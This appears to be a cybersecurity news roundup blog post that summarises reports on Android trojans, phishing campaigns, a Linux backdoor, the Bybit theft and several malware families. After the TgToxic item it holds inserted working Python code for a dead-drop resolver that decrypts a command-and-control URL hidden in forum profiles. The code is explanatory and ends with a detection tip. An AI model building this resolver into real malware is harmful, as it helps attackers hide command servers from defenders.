Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.
For more articles, check out our #onpatrol4malware blog.
Predatory app downloaded 100,000 times from Google Play Store steals data, uses it for blackmail
Source: Malwarebytes LABS
A malicious app claiming to be a financial management tool has been downloaded 100,000 times from the Google Play Store. The app, known as “Finance Simplified”, belongs to the SpyLoan family, which specializes in predatory lending. Read more.
Android trojan TgToxic updates its capabilities
Source: Intel471
This new version of the trojan abused 25 community forums to host encrypted malware configurations. The actors created user accounts on these forums and embedded specific encrypted strings within the user profiles, serving as dead drop locations from which malware bots could retrieve the final command-and-control (C2) URL. Read more.
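The dead-drop mechanism described above, worked through as an added example (this is not TgToxic's code or Intel471's analysis): a bot fetches a forum profile, finds a marker it knows, decrypts the string inside it, and only then learns the real C2 URL. The marker format, the XOR key, the JSON layout and the profile text are all assumptions constructed for the illustration; the real malware's cipher and markers are not described on this page.

```python
"""Dead-drop resolver: recover a C2 URL from an encrypted string hidden in a
forum user profile. Illustrative only; the marker, key and cipher are assumed
(base64 + XOR stand in for whatever scheme the real malware uses)."""
import base64
import json
import re
from typing import Optional
from urllib.parse import urlparse

# Assumed marker that brackets the hidden config inside the profile bio.
MARKER_RE = re.compile(r"\[\[cfg:([A-Za-z0-9+/=]+)\]\]")
# Assumed static key; a real sample would carry its own.
XOR_KEY = b"tg-dead-drop-key"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_dead_drop(config: dict, key: bytes = XOR_KEY) -> str:
    """Build the string an operator would paste into a profile.
    Used here only to construct sample data for the resolver."""
    blob = xor_bytes(json.dumps(config, separators=(",", ":")).encode(), key)
    return "[[cfg:" + base64.b64encode(blob).decode() + "]]"


def resolve_dead_drop(profile_text: str, key: bytes = XOR_KEY) -> Optional[str]:
    """Scan profile text for the marker, decrypt each candidate, and return
    the first well-formed http(s) C2 URL found, or None."""
    for m in MARKER_RE.finditer(profile_text):
        try:
            plain = xor_bytes(base64.b64decode(m.group(1)), key)
            cfg = json.loads(plain)
        except ValueError:  # bad base64, bad UTF-8 or bad JSON: not our payload
            continue
        if not isinstance(cfg, dict):
            continue
        url = cfg.get("c2")
        parsed = urlparse(url if isinstance(url, str) else "")
        if parsed.scheme in ("http", "https") and parsed.netloc:
            return url
    return None


# Constructed sample: a fake forum profile page with noise around the dead drop.
SAMPLE_PROFILE = (
    "<div class='bio'>Hi all, new here. Love retro games. "
    + encode_dead_drop({"c2": "https://example.invalid/gate", "v": 2})
    + " Cheers!</div>"
)


def resolve_sample() -> Optional[str]:
    return resolve_dead_drop(SAMPLE_PROFILE)


if __name__ == "__main__":
    print(resolve_sample())
```

The defensive takeaway is the shape of the traffic, not the cipher: an app that fetches a handful of public forum profile pages shortly after install and then opens a connection to a host that appears nowhere in its static strings is the pattern worth alerting on.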
Phishing Campaigns Targeting Higher Education Institutions
Source: Google Cloud
These attacks exploit trust within academic institutions to deceive students, faculty, and staff, and have been timed to coincide with key dates in the academic calendar. The beginning of the school year, with its influx of new and returning students combined with a barrage of administrative tasks, as well as financial aid deadlines, can create opportunities for attackers to carry out phishing attacks. Read more.
Auto-Color: An Emerging and Evasive Linux Backdoor
Source: Unit42
Between early November and December 2024, Palo Alto Networks researchers discovered new Linux malware called Auto-color. The name comes from the file name the initial payload renames itself to after installation. Once installed, Auto-color gives threat actors full remote access to compromised machines and is very difficult to remove without specialized software. Read more.
The Bybit Incident: When Research Meets Reality
Source: CHECKPOINT
The log indicated that the AI engine identified an anomalous change in this transaction and categorized it as a critical attack in real time. Bybit's cold wallet was hacked, resulting in the theft of approximately $1.5 billion worth of digital assets, primarily Ethereum tokens. This incident marks one of the largest thefts in the history of the digital asset industry. Read more.
Beware: PayPal “New Address” feature abused to send phishing emails
Source: BLEEPING COMPUTER
An ongoing PayPal email scam exploits the platform’s address settings to send fake purchase notifications, tricking users into granting remote access to scammers. The email includes the new address that was allegedly added to your PayPal account, a message claiming to be a purchase confirmation for a MacBook M4, and an instruction to call the enclosed “PayPal” number if you did not authorize the purchase. Read more.
Angry Likho: Old beasts in a new forest
Source: SECURE LIST
Angry Likho (referred to as Sticky Werewolf by some vendors) is an APT group we’ve been monitoring since 2023. It bears a strong resemblance to Awaken Likho, which we’ve analyzed before, so we classified it within the Likho malicious activity cluster. Read more.
FBI and CISA Warn of Ghost Ransomware: A Threat to Firms Worldwide
Source: HACK READ
FBI and CISA warn of Ghost ransomware, a China-based cyber threat targeting businesses, schools, and healthcare worldwide by exploiting software vulnerabilities. Read more.
LummaC2 malware distributed disguised as Total Commander Crack
Source: ASEC
ASEC discovered LummaC2 malware being distributed disguised as a crack for Total Commander. Total Commander is a file manager for Windows that supports various file formats and provides convenient overall file management, including copy and move functions, advanced search using strings within files, folder synchronization, and FTP/SFTP support. Read more.
Updated Shadowpad Malware Leads to Ransomware Deployment
Source: TREND MICRO
Two recent incident response cases in Europe involved Shadowpad, a malware family connected to various Chinese threat actors. Our research suggested that this malware family had targeted at least 21 companies across 15 countries in Europe, the Middle East, Asia, and South America. Read more.